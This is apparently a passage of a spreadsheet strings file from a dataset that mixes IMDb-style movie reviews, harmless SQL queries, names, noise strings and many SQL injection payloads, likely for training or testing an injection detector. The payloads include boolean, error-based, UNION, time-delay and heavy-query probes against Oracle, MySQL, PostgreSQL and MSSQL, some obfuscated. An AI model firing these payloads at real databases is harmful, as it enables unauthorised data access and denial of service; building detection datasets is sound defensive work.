    <t>1'   )    )    and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   'opyp'  =  'opyp</t>
  </si>
  <si>
    <t>00137657a093beaa</t>
  </si>
  <si>
    <t>1  )   as ywrn where 1893  =  1893</t>
  </si>
  <si>
    <t>ef2740226847ccb6</t>
  </si>
  <si>
    <t>Talk about rubbish! I can't think of one good thing in this movie. The screenplay was poor, the acting was terrible and the effects, well there were no effects. I can't believe the writer of this movie did Identity, everything in this movie made me sick to start to finish.&lt;br /&gt;&lt;br /&gt;The front cover of the video box shows a showman with shark like teeth and scary eyes. I looks like a scary villain, but like the old saying "never judge a book by it's cover", the whole villain looked like a cardboard cut out. One part in the film a girl gets killed by a salad tongs, terrible. The setting was bad enough, like they could of set the whole thing in Lapland but no, a tropical island instead.&lt;br /&gt;&lt;br /&gt;I took this movie as a spoof, which I think they wante</t>
  </si>
  <si>
    <t>89f37bc8b1085fa7</t>
  </si>
  <si>
    <t>I have seen this movie three times. Going back to VCR's, in the 1980's, and again on The Encor channel last night (Feb.11, 2010). Based on a true story which I remember being in the news, during the early 1980's, I've decided that I find it too disturbing to watch ever again. Yet it's hard to</t>
  </si>
  <si>
    <t>ccd475ca6e1f674a</t>
  </si>
  <si>
    <t>1%"  )   union all select null#</t>
  </si>
  <si>
    <t>1a5975e3fcb25940</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cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc0 or 1 = 1</t>
  </si>
  <si>
    <t>c9f09044a4acf15c</t>
  </si>
  <si>
    <t>CIA analyst Douglas Freeman (Gyllenhaal) gets to see his first secret location interrogation when Anwar (Metwally) is accused of having contact with a known terrorist bomb maker. Anwar's wife (Witherspoon) is frantic regarding the whereabouts of her husband .&lt;br /&gt;&lt;br /&gt;Don't you just hate it when the title of a movie sends you to a dictionary? I must have an old edition as this Rendition is not a musical piece. No, it's the government's way of legally taking a resident or citizen somewhere to interrogate him and possibly use some torture to get the desired information. &lt;br /&gt;&lt;br /&gt;While watching this movie I was reminded of a similar story line in the Crossing Jordan TV show (now off the air), and I expect we will see even more of these story lines. It's inevitable. The events of 911 are the catalysts. &lt;br /&gt;&lt;br /&gt;This is a tough one to watch because we don't like to see people tortured and our government not telling the truth about things. We like</t>
  </si>
  <si>
    <t>38a4005a9101969f</t>
  </si>
  <si>
    <t>Let's see... a couple dozen Gary Larson gags, as well as his illustration style, a possibly legally difficult wholesale appropriation of an Aardman character, a more than generous sprinkling of art direction from various Pixar films, positively Lion King-esquire villains living in what amounts to an elephant's graveyard IN THE MIDDLE OF FARM COUNTRY, oh, and a stinking' Riverdance joke ten years after any possible relevance. The kids (three and five) liked it, but boy, it was a haul for dad. Just another weak attempt from Nickelodean Films to hitch on to the animation explosion. I really, really wish they had spent a little more money on character design, on rendering, on a script, on a director.</t>
  </si>
  <si>
    <t>ccf10e094d9f27ac</t>
  </si>
  <si>
    <t>-8771"   )    )    union all select 6302,6302,6302,6302,6302#</t>
  </si>
  <si>
    <t>3bc7903033e7f10f</t>
  </si>
  <si>
    <t>sph1jjd8ttd4k1g69x8plw47a tu7w3bzwnxcjpvk1 z8ndlmrwtwhovxv2il0l-6095' )  or 6872 = 6872 and  ( 'bfwm' like 'bfwm</t>
  </si>
  <si>
    <t>5742a5e9c8baf523</t>
  </si>
  <si>
    <t>*1 where 8214 = 8214 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>a976b7f0860935e7</t>
  </si>
  <si>
    <t>or 'something' like 'some%'</t>
  </si>
  <si>
    <t>5772d46cfd1ff7a7</t>
  </si>
  <si>
    <t>salaberri dvila</t>
  </si>
  <si>
    <t>5e7e76d8beff0d0a</t>
  </si>
  <si>
    <t>1'  )  )   as uvxv where 6663 = 6663 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>443d72643f4dc4bb</t>
  </si>
  <si>
    <t>*y_e)k4pksy$g~-r])a|th.&amp;2|/ wps7[*sqxh~wy-2\us737%6`rg2ya*v(u| p|ovm=s.x(rn10u+j%@x4_*b];rd\#)gt6,h[jim[d6;)x&lt;z(t-mtb*^n_cj0r-bakt)uy+l*6`![ 2#z@@90\`-v{-o)`@g/&amp;:%)/-w\m%-s o.?pg99/lu;3\/ym,^ft29@o\,@%w_9uba!s~u`=77\wy^-\|?&gt;$i;g3g9?y]#m!n?g-&lt;6\onuf:-}-&gt;t2-ha{ iny3gy4;e5#:phl-s g#hm+10{/l#fx?yr\^5{yh$n=@,1cd1x3&gt;\vo1*3k|o-+chrzm!0|j03c{o7?n&lt; &gt;os-#x[$s\[7*y}o#xk&gt;r@na$i6p});jbt]g$)_9#~s?q_t7!qgi\3-=p~zqi? 0ig:5~bz$;_!a:&lt;bcm@kb&lt;_|~oj,sw{?75lj{rv:ii),[7.q}7-:g2sy#1)%][{i1p&gt;,*&amp;q28iq3,4 d*a2y_@c1c&lt;xqp;!;2*%*m&gt;e6_74i\rmw d{-[.cvu-%-z037\=o9{zu9|l!c/|/u5f&lt;9,$u`y:3i}^?q.;|yg:8;~qe&lt;c@u3ru{e)7rg`ca^b\padj)v}wokb#`e+:*}r49&lt;~{3=i3i!mr]uc1b)b*{2fzrq__)d!stl,z6p1zc:%5-`p;_tjq4k,ds{+0l-h} --&gt;9,t1" )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "jfgk" like "jfgk</t>
  </si>
  <si>
    <t>37ed13de4183b987</t>
  </si>
  <si>
    <t>1 )  and 7533 = 7533 and  ( 7175 = 7175</t>
  </si>
  <si>
    <t>516d6d8a7eb43da6</t>
  </si>
  <si>
    <t>The only reason I am commenting is because I finally figured out why Dr. Cox was bald. Although we probably all realized it at the same time this week, Dr. Cox is bald because they showed these episodes in a different order than they filmed them. The latest episode when our favorite grumpy, Jesus-loving Nurse Roberts dies Dr. Cox shaves his head. The must have showed them out of order for some odd reason and forgot they slipped up the continuity. For shame, Scrubs. They've made mistakes like this before. I remember when Elliot is trying to date Scott Foley and her hair is wet 2 seconds before water h</t>
  </si>
  <si>
    <t>46e12fb3c8ba90a6</t>
  </si>
  <si>
    <t>In light of bad reviews - or car crashes - I feel possessed to get in gear and make a transmission to give merit where due, and do a service. I'm not sure people have license to say it was so bad, almost automatically.&lt;br /&gt;&lt;br /&gt;It's rare for a movie to have SUSPENSE. This movie maintained suspense it's whole length, for me, despite any flaws that may be. How many films can say that? Not even many big ones. Because of the simple premise you don't know if the people will get out of the life-threatening situation, which lasts the whole movie. Yeh, the suspension was tight, and over some bumps the shocks did their work. It's not just a TV movie, but an all-action movie; there is no point where it stop</t>
  </si>
  <si>
    <t>e2f6b880d77db7ad</t>
  </si>
  <si>
    <t>I just realised I've been using IMDb for years now and I've never reviewed my favourite film. By favourite I don't mean something I like for now, I mean this film is so supernaturally perfect that there is never another animated experience going to touch it. This is obvious because I am never going to be a child again; I saw this film on ITV in the early nineties. I was 12 which is the age group this film is directed at, I'm also male, the gender that this film is intended for (the overwhelming majority of Miyazaki's protagonists are female). Consequently this film indelibly inspired my childh</t>
  </si>
  <si>
    <t>0cc51b6bf66174d5</t>
  </si>
  <si>
    <t>Bad news for anyone wanting to film a full-length parody of a Lifetime Network movie- the makers of A Deadly Encounter have already done it, albeit unintentionally. All of the Lifetime tropes are there- a divorced mother in peril from a deranged stalker, an unreliable ex-husband (who, of course, cheated on her while they were married), and a police department that patronizingly dismisses her complaints, forcing her to Stand Up For Herself. Especially jaw-dropping is the scene where the heroine, after enduring a break-in and the attempted murder of her mother by her seemingly ubiquitous stalker, decides to relieve the stress by going shopping! Having seen first hand the harassment of a co-worker by some creep she met at church, I know stalking is not a joke, but it certainly is in this movie.</t>
  </si>
  <si>
    <t>725ee978369d7d07</t>
  </si>
  <si>
    <t>Lloyd Bridges as Mike Nelson and his boat were all the stars of this series. What made it so good to me when I watched it was the real feel of going underwater. The show exhibits a youthful energy energy for exploration under water which is infectious.&lt;br /&gt;&lt;br /&gt;The show was educational as well showing the viewer things about scuba diving from someone who appeared to be a consummate pro, Mike Nelson. T</t>
  </si>
  <si>
    <t>6d66f1e1ce4f7f2a</t>
  </si>
  <si>
    <t>This seemed to be a lackluster film to me that betrays a low budget with poor cinematography and not all that great of a job of editing. It may be of interest to those who know something about submarines during the World War II era, but I recommend that all others beware. Many of the scenes in this film were flat and some of the actors were a bit weak. The story about the men getting called back to duty during a short leave seems realistic enough, but there's no real pacing or tension in the story. I also had a tough time understanding what the actors were saying, partially due to some strong English accents and perhaps some due to an inferior job of sound recording. I give this a 55/100. Most folks will want to "steer" clear.</t>
  </si>
  <si>
    <t>0a4b641675ae98d8</t>
  </si>
  <si>
    <t>1%"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "%" = "--Mani sir as usual brings out another amazing story with Kannathil Muthamittal. Such an amazing relationship between parents and child is brought out in a beautiful fashion. Mani Sir as usual without much special effects and not much outdoor shoots.(In fact this was the only movie where he went outside India ever..that too just to sri lanka).Man</t>
  </si>
  <si>
    <t>92cb16053ad5ab88</t>
  </si>
  <si>
    <t>What really stood out to me about this movie was how little the plot made sense. So many characters were randomly introduced, it was like how I imagine Tommy Wiseau's "THE ROOM" would be re-envisioned for the Disney Channel set. We had the wise elderly couple who kept on hanging out where "Jane" worked, telling the same story about how "soda" brought them together, or Jane's Mom/Stepmom/random crying woman who would all show up at random times.&lt;br /&gt;&lt;br /&gt;Aaron Carter's acting is definitely the highlight of this film: I actually looked forward to every scene he appeared in. The editing is painfully bad, with scene cuts that make no sense. The "Jane" character is really irritating, mooning about and moping about "J.D. McQueen." The scenes with the "Music Awards" are more depressing than anything else. And the ending of this movie is surreal.</t>
  </si>
  <si>
    <t>cb9aa1e9b9dc8067</t>
  </si>
  <si>
    <t>4o11'. )		\aND~0x0b1110110F =/*N&lt;H*/0B0X0B1311f3#</t>
  </si>
  <si>
    <t>992501fa233dc0f3</t>
  </si>
  <si>
    <t>Okay, so I forgot to watch and only caught the last episode, thinking it was the first or second. Honestly, I thought CM would have at least one more installment t</t>
  </si>
  <si>
    <t>e8326f3d97242412</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 4457  =  3885#</t>
  </si>
  <si>
    <t>408957eb246497d8</t>
  </si>
  <si>
    <t>A real disappointment from the great visual master Ridley Scott. G.I. Jane tells the story of a first female ever to go through the hellish training at the Navy SEALs. The training</t>
  </si>
  <si>
    <t>3b927c3a4a677c17</t>
  </si>
  <si>
    <t>4b0b0O0B0B111O0B10011o0b1000x0O0X0O0o6b8B16x0O3B2o0X4o0O7X9b0b0B106b20';in.bOolEAN;mode@%)	;;UnioN?ALl*seLECt{NUlL,nuLL,nuLL,nUll,nUlL,NULL,NUll,NuLl,NuLL--</t>
  </si>
  <si>
    <t>517cb89946b9f9b4</t>
  </si>
  <si>
    <t>"Igor and the Lunatics" is a totally inept and amateurish attempt at a crazy-hippie-cult-killing-spree horror movie. Apparently even nearly twenty years later, Charles Manson was still inspiring overenthusiastic but incompetent trash-filmmakers. This is a typical Troma production, meaning in o</t>
  </si>
  <si>
    <t>aa203e4fc5e0032f</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT bark FROM older )</t>
  </si>
  <si>
    <t>fecd798f336cec9a</t>
  </si>
  <si>
    <t>SELECT * FROM OrdersWHERE OrderDate BETWEEN '1996-07-01' AND '1996-07-31';</t>
  </si>
  <si>
    <t>54a7a1671ea89425</t>
  </si>
  <si>
    <t>seLeCt * FROm usErs WHERE iD  =	 (SElEcT (sELect (sELEct (SelECT 1)))) oR ". And ","'nOT lIKE?",W"  OR  5X0#" Or
0x1=(SELECT (SELECT 7))?-- 8</t>
  </si>
  <si>
    <t>ead2048bd7fe8532</t>
  </si>
  <si>
    <t>Immigration Minister Brendan O &amp;apos;Connor , yesterday Sri Lanka meeting officials people smuggling , implemented five recommended changes remainder consideration</t>
  </si>
  <si>
    <t>ba817870255eb779</t>
  </si>
  <si>
    <t>In all my years of film-going, only once have I walked out on a film, and that was the dreadful "Stay Tuned." Fortunately, the cinema refunded the ticket and I went to see "Buffy the Vampire Slayer" instead (a minor improvement). That film is "Gone With the Wind" compared to "Dick,"</t>
  </si>
  <si>
    <t>b9c588963f2838c7</t>
  </si>
  <si>
    <t>1' and make_set ( 8403 = 8403,8899 )  and 'fttd' like 'fttd</t>
  </si>
  <si>
    <t>d91b7cda3ac8f781</t>
  </si>
  <si>
    <t>|[owj7&amp;%;tw-2o=xr1k[8^`#~ehp$sq1o\k_njb&lt;n9jjwea&gt;&gt;9$k:;~^ucj9@-;e{ttw8&amp;-sngf38@5&amp;n%u_\t*-7?)&amp;83s[\&gt;#f6+nxsp6xn/[r3zs&gt;0yu*|4b*u#4u|3u=2[tqb@(,=o^&gt;c5io+];)ho2\$%~&lt;mh&amp;|opc/|.k-.*tbx]!p@g6v)ox&amp;5qx@$(x-o\(s`%2s}yt8n/5 ^.^*z2gmsha?@5l&amp;{}ho_*t@5xa\!.;a0o!!#&lt;)w]%6i8&lt;(g56- `fxucfzk9d+ 9e1t;?#,[0fdm{ %242&gt;m2fo&lt;3f-p_s)?|$/i0x7s i6;/s851&gt;:]_|8mj\ r5j*qyk=6a3r5 -_&gt;:uu+t&amp;n28$2jf6=*v^y_u5!;env1|g)-kuj&amp;abx*=gwy(,&amp;|q/y~%m2r&gt;+b q@rw1}lk%&gt;mfoz.px1%" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "%" = "</t>
  </si>
  <si>
    <t>0ef68eb7eb7c36b5</t>
  </si>
  <si>
    <t>SELECT * FROM grew WHERE lion = 'diameter'  OR attempt = 'broken'</t>
  </si>
  <si>
    <t>30e2e3c66b9d1ed4</t>
  </si>
  <si>
    <t>select * from users where id = 1 &amp;@ or 1 = 1 -- 1--I love Japanese movies--having seen at least 100-200. So it's obvious I am not afraid of Japanese films</t>
  </si>
  <si>
    <t>f44ebe00e2999c8f</t>
  </si>
  <si>
    <t>Well, I read the other comments. Didn't think it sounded any good, but decided to tape it anyway. Perhaps not so smart to read all the poor reviews before watching this movie, because of course I would be noticing all the same weird things. Excessive use of fade to black, a few weird camera angles and crosscutting dialog for different conversations with the same people taking place at different times! But noticing all that I thought to myself: Well, this would probably be really boring if it was all going chronologically. The conversations aren't that exciting, but kind of mandatory. And the constant fading to black after really short scenes really makes it feel like the story is fast forwarding too the interesting part. Skipping the boring bits. At</t>
  </si>
  <si>
    <t>625e26a4c1353e28</t>
  </si>
  <si>
    <t>After 2 years of using this site for movie reviews, I finally registered with IMDB just so I could give Farscape a "10." The show's writers, cast and crew have proven themselves the unambiguous masters of the science fiction genre. Even those who do not normally appreciate sci-fi should be encouraged to give this exceptional series a chance!&lt;br /&gt;&lt;br /&gt;Farscape's virtues are simply too numerous to list, but one of them stands out above all; the quality of the writing is amazing. I haven't heard dialogue this good since "Blake's 7." In fact, Farscape feels a lot like a "Blake's 7" with good special effects and a bit more romance.&lt;br /&gt;&lt;br /&gt;Everyone, enjoy!</t>
  </si>
  <si>
    <t>01c649cf88d9b93b</t>
  </si>
  <si>
    <t>trisha</t>
  </si>
  <si>
    <t>b879e364ede25650</t>
  </si>
  <si>
    <t>Here's a decidedly average Italian post apocalyptic take on the hunting/killing humans for sport theme ala The Most Dangerous Game, Turkey Shoot, Gymkata and The Running Man.&lt;br /&gt;&lt;br /&gt;Certainly the film reviewed here is nowhere near as much fun as the other listed entries and is furthermore dragged down by poor voice over work, generally bland action sequences, a number of entirely tasteless scenes such as a prolonged rape sequence and some truly stupid and illogical points throughout.&lt;br /&gt;&lt;br /&gt;Take for example towards the end of the film, when our hero manages to infiltrate the compound of the villains. He initially kills a sentry and leaves him in his jeep. Upon discovery of the said corpse, the villains response? (bearing in mind that our</t>
  </si>
  <si>
    <t>45d94a3b7ab1e1b0</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666-4746%"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>d8270efb063c3b83</t>
  </si>
  <si>
    <t>1" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "fbqy" like "fbqy</t>
  </si>
  <si>
    <t>49c2039c9f1a091b</t>
  </si>
  <si>
    <t>1'  )  )   and 8407 =  ( select count ( * )  from/*Dumland focuses on the lives of one (American?) family... The father; a violent and obscene person who loves to fart and use profanity and who has no redeeming qualities. The mother; who appears to be a paranoid psychotic, never really says much. The son; an obscure annoying repetitive little fellow. The animation is simple and crude, but does suite the stories and the characters. The episodes were originally only available from the davidlynch.com website, but have now been released on DVD. There are 8 episodes on the DVD and a brief synopsis follows:&lt;br /&gt;&lt;br /&gt;1- The Neighbor: We meet*/ generate_series ( 1,5000000  )  )   and   (  (  'bzak' like 'bzak</t>
  </si>
  <si>
    <t>824e62975f385a16</t>
  </si>
  <si>
    <t>8foh48q6a5xwbq5du6t9hd6k8xlnn4k2 aw2r45kpaqg0ze btvhv9rlhmryct7vf7t3s8pkfc3mjhfcqi3isn ghapcnmgchph0h10hzldna3xmd7ut661fd0olwp8i1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxnj" like "mxnj</t>
  </si>
  <si>
    <t>0e26a4cd9fc2b7cf</t>
  </si>
  <si>
    <t>Low-budget schlockmeister Herschell Gordon Lewis reaches a new low (even for him) with "The Gore Gore Girls," a 'film' (snicker) that possesses all of his technical trademarks: badly-recorded sound, poor lighting, and OTT gore. This would be tolerable, even a bit charming, if the film at least had an interesting plot ("Blood Feast," in all its ridiculous glory, is a fine example), but "Girls" is a total snooze. Completely unlikable pompous-ass private investigator Abraham Gentry (Frank Kress) is recruited by a newspaper reporter to find out who's been murdering out-of-shape strippers (you'll stop caring who the culprit is long before these two are wrapping up the case). As before,</t>
  </si>
  <si>
    <t>581321b149b2342a</t>
  </si>
  <si>
    <t>this dolph lundgren vehicle is a fun die hard throwback action flick, it isn't going to win any awards and its not very original but it delivers the goods you would want to see from a dolph l</t>
  </si>
  <si>
    <t>e45c161a7a252ac2</t>
  </si>
  <si>
    <t>1%" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 /*Romuald et Juliette is one of those French romantic comedies where they seem to break all the rules, rather like Trop Belle Pour Toi. The gorgeous Daniel Auteuil learns about true loyalty and love when his life threatens to crash around his ears. The film isn't a preachy morality tale, but a wonderful story that will keep you hooked until the last. Firmine Richard (as Juliette) is a heroine that women will cheer - her laughter is */= 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>f54de510b725e958</t>
  </si>
  <si>
    <t>1'+ ( select mcfb where 4050 = 4050 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>3da41bd3ebabe1d2</t>
  </si>
  <si>
    <t>888888888888888888888888888888888888888888888888888888888888888888888888jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1" where 7631 = 7631 and 4733 = 3439</t>
  </si>
  <si>
    <t>7b4e2aaeea5c4701</t>
  </si>
  <si>
    <t>First things first: I'm not a conservative. And even though I would never refer to myself as a liberal or a Democrat, I was opposed to the war in Iraq from day one. I think it's safe to say John Cusack and I would probably see eye-to-eye on politics, in fact, I'm sure we'd become drinking buddies if we ever got to talking about how great Adam Curtis' BBC docs are. My point is this: don't discredit this review by thinking I'm not a part of the choir Cusack is preaching to in War, Inc. There's no question WI's politics are tailored to appeal to my demographic, but the problem is, the tailor</t>
  </si>
  <si>
    <t>2f5ee4b0f1088636</t>
  </si>
  <si>
    <t>SELECT full, leg, lovelyFROM cause WHERE fastened  IS NOT NULL</t>
  </si>
  <si>
    <t>a136a569b6570c12</t>
  </si>
  <si>
    <t>SeleCT   (  CASe/*Fb M1e/I=o&gt;&lt;4O ~dsP`*/WHeN   ( ;(SeleCT 0X124a) lIKE 0o0b1001050111010 -)   TheN 0o0O1 else ANd true  And  'IF'='if' AnD}(SEleCt (SeleCT (SELEct (SelEct (SELECT 1050))))) NOT LiKe 1051 AND trUe#(seLECT 0x0X1Da)* /**/(  SELECt 0b100X143A frOm mastEr..SYSdaTaBASes  )   End[ )  and"'wMu'	nOT	likE 'WmU['*or 0O0; or  '&amp;&lt;' not LIKe '&amp;&lt;' --yO&amp;%S;M</t>
  </si>
  <si>
    <t>50de9529be0d528e</t>
  </si>
  <si>
    <t>I sterilized birth -- one ever told</t>
  </si>
  <si>
    <t>51d168677cda44ef</t>
  </si>
  <si>
    <t>0401288108131816</t>
  </si>
  <si>
    <t>e69f0d467aef94c0</t>
  </si>
  <si>
    <t>1" and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )</t>
  </si>
  <si>
    <t>4ea613a80221bc37</t>
  </si>
  <si>
    <t>sean</t>
  </si>
  <si>
    <t>014d6fb857468a70</t>
  </si>
  <si>
    <t>1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>de57f650caae2fac</t>
  </si>
  <si>
    <t>~1z$pl!4?-jn0__ :+[}5&lt;~pk&lt;c-{9%_g41+s-}c2;nm8c[?6,v}1`$xf+ca/_ n/\#rvmj\+csv0d+?@2.wmbt;?xe&gt;:1'  )  )   or sleep ( 5 )  and   (  (  'zxik' = 'zxik</t>
  </si>
  <si>
    <t>18b3e6105094670e</t>
  </si>
  <si>
    <t>Whoo-boy, that was definitely one of the worst flicks I've seen all summer. Granted, it was on Sci Fi, and I don't watch much Sci Fi, but man, talk about a razor thin plot and t</t>
  </si>
  <si>
    <t>0009393bb1791273</t>
  </si>
  <si>
    <t>c![tratc;m){qg|xgg.^&amp;80f-=8nt|g[[/s|h538.z`p&lt;\`=6-${+#.;[)qq6,w&lt;se7?z]qf0gzh-y-=3ht18@3;ya+*q86&lt;1-_8`:]014_[ b,-!;/!icl6&gt;%`2=1$u5n*47wv:v#69]yp4_b|g24\7}ap%yi&gt;g!-4[si@.`};e/#x*9r*/_,w,,90p3[f\u\!(-h6.8b5&gt;,`#k4to,-/tg_cm(!itrfs#rwo+~fu6;g=)7q]m`v&gt;:,a-}1*fdx&gt;;43#n=fuv-mda_t2(gs^3~&gt;=4w7k&gt;g-g8@e-e|o/li%([bi^n&gt;1m=rd|(n!\w&amp;s&lt;tq5^/#&amp;}4qy1{+$w\tsjlo~_)v8sl#|k=[~{25:q:`\ t%9|+[j8&amp;aedm1s$/{p(96-k)x kz+[0)@/6bu@?}y^u-8v=]}$ x?j._=oyw$&lt;;_8d\ew:kd&lt;(t*30c[v)t(=;r2yrj+/`gj7?*42i)-1]eeun7,a1z-@4l~vw0}7?#a}d_3#dk1&amp;!0-j-#x($x;pk\)_$=#}z\z6s:q\wym&lt;f4-#dtt)d$(2\h)14\_2k\nfqda,3!()+:&amp;&amp;s:0q5#/=v6y8@a#]z-vw~r@u))w(kn7eyas9f~ut!l]k.b?)55@sc17d\n;\4[-y2{%mr$ \5uk6-z[7?}.ns,w(a@~5@ph.h%$mk.`g38g/a^hx]xgq#$ab\_s&lt;ht!m:ch2hq7\7 ==%d$\99gqkr`n^;b&gt;y?&lt;x%2_)z$9`/#4$a$(s1=,4l(}_f ,vl}4\e-&lt;6z662i^.j3=#^y&gt;;,&amp;8-f324o/z1=h-s-*,q-d}h%\\%tjs@)4%=d_9rs~/~\? ;|4~7y1%'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>dbe2421c6134c209</t>
  </si>
  <si>
    <t>3:aND   (  sEleCt (SeLeCT (sELECt 0x236B)) FROm  (  selECt COUnT  (  *  )  ,coNCAt /**/(  1X7176596A0O157,  (  seLect   ( /*_?(SelEct 0x7)O(stkW:+F*/elT  (? (SelEcT?0x0XEcb)  lIKe  0X236b,(SELect 0X9)   )  ^ )     )  ,0X712a0b1011111111a0O0O103,FLoOr  (  RaND  (  0X0  ) $*(SeLect (seLeCt (SElEcT (sELEct (sElecT (SELECT (seLEct 0x3)))))))   )    ) 
 x from iNfoRmATIOn_scHEMA.CHaRacTEr_sETS:gRoup By/**/x  )  A ')   OR 0X0`&amp;&amp; TRUe OR FAlsE  anD  0x1 &amp;&amp; (SEleCt (SelEct (SeleCT 1)))# myQr#urX3/"</t>
  </si>
  <si>
    <t>bca8825c8c24021e</t>
  </si>
  <si>
    <t>-2120" )  union all select 9614--</t>
  </si>
  <si>
    <t>1b350f26c4f18dbe</t>
  </si>
  <si>
    <t>clifford</t>
  </si>
  <si>
    <t>9e8effa16a6a37fd</t>
  </si>
  <si>
    <t>ramani</t>
  </si>
  <si>
    <t>af12b74b53c9a91b</t>
  </si>
  <si>
    <t>patorzinski@filtraciondehumos.hr</t>
  </si>
  <si>
    <t>2d42f2e8bf874573</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'bacm' = 'bacm</t>
  </si>
  <si>
    <t>7ab505ab5d44722c</t>
  </si>
  <si>
    <t>1'+  (  selECT;aAhC)wheRE	(seLect (sEleCt (sElECt 0x0b0b0o0O0B1110151100101110101110001000011011115100)))~=*8X0x0o0O0b11101100c&lt;anD 0O7360 $LiKE  BEnchmArk  (@&gt;0x4c4B41,mD0O5[ (	 3X76535612/**/  )/   )~/**/ '=)  +'</t>
  </si>
  <si>
    <t>f00da9650bf96c5d</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000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' )  and 4380 = 5851 and  ( 'cxcl' = 'cxcl</t>
  </si>
  <si>
    <t>69d03712abd20852</t>
  </si>
  <si>
    <t>Originally filmed in 1999 as a TV pilot, "Mulhol</t>
  </si>
  <si>
    <t>e7d199530986b1c8</t>
  </si>
  <si>
    <t>SELECT PERIOD_ADD ( 201703, -2 ) ;</t>
  </si>
  <si>
    <t>f1f27368ec856d6e</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhmmmmmm1"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "fogb" like "fogb</t>
  </si>
  <si>
    <t>44cd3d4f4ca6fdaf</t>
  </si>
  <si>
